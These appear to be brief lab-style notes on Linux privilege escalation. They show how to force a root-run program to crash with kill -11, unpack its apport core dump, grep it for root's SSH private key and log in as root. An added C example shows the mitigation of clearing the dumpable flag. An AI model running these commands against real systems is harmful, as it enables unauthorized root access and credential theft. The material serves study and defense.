case study 1

#include <sys/prctl.h>
prctl(PR_SET_DUMPABLE, 1);   /* mark the process dumpable so the kernel writes a core file when it crashes */

If we kill the program in the middle of its run by causing a segmentation fault, the kernel writes a core dump of its memory, and we can recover the data it was working on from that dump.

i.e. if the program was reading data as root, we can analyze what that data was even though we are not root.

ps -ef | grep count   # find the PID of the running program "count"
kill -11 PID          # send SIGSEGV to force a segmentation fault (replace PID with the number found above)
ls -la /var/crash     # crash reports are usually stored here
apport-unpack crash_file.crash /tmp/log   # unpack the crash report into /tmp/log (the directory that receives the files)

Now go into /tmp/log (the directory given to apport-unpack); the process memory is in the file named CoreDump.

grep -a root CoreDump   # -a treats the binary core file as text

If this succeeds, we can check whether the dump contains an SSH key file for root:

/root/.ssh/id_rsa 
Repeat the same process as above to copy the id_rsa key contents out of the dump into a local file (root.key), then:
chmod 600 root.key   # ssh refuses a key file with looser permissions
ssh -i root.key root@localhost
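As an added example (not part of these notes), the process-side mitigation for the technique above: a program that handles a secret clears the dumpable flag with prctl(PR_SET_DUMPABLE, 0) before the secret is in memory, so kill -11 produces no core file for apport to collect. The function names and the secret string are constructed for illustration; the code assumes Linux.

```c
/* Added example, not from the original notes: the process-side mitigation.
 * A program that handles a secret clears the dumpable flag before the secret
 * is in memory, so kill -11 writes no core file and the grep over CoreDump
 * above has nothing to find. Secret is a constructed placeholder; Linux only. */
#include <stdio.h>
#include <stddef.h>
#include <sys/prctl.h>

/* Current dumpable flag: 1 = a crash produces a core file, 0 = it does not. */
int dumpable_state(void) {
    return prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
}

/* Set the flag and return the value the kernel reports back, or -1 on error. */
int set_dumpable(int on) {
    if (prctl(PR_SET_DUMPABLE, on ? 1L : 0L, 0, 0, 0) != 0)
        return -1;
    return dumpable_state();
}

/* Overwrite a buffer through a volatile pointer so the compiler cannot drop
 * the store as dead; returns 1 when every byte reads back as zero. */
int secure_zero(char *buf, size_t len) {
    volatile char *p = (volatile char *)buf;
    size_t i;
    for (i = 0; i < len; i++)
        p[i] = 0;
    for (i = 0; i < len; i++)
        if (p[i] != 0)
            return 0;
    return 1;
}

/* Stand-in for the "count" program: use a secret, then scrub it. Returns the
 * dumpable state in effect while the secret was live (0 = protected). */
int handle_secret(void) {
    char secret[] = "CONSTRUCTED-PLACEHOLDER-SECRET";
    int state = set_dumpable(0);         /* the weak setting is set_dumpable(1) */
    /* ... the secret would be used here; a SIGSEGV now leaves no core file ... */
    secure_zero(secret, sizeof secret);  /* nothing left behind for a later dump */
    return state;
}

int main(void) {
    printf("dumpable before: %d\n", dumpable_state());
    printf("dumpable while secret live: %d\n", handle_secret());
    return 0;
}
```

With the flag at 0 the kernel also hands ownership of the process's /proc/PID files to root, so an unprivileged user cannot read the live memory either.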
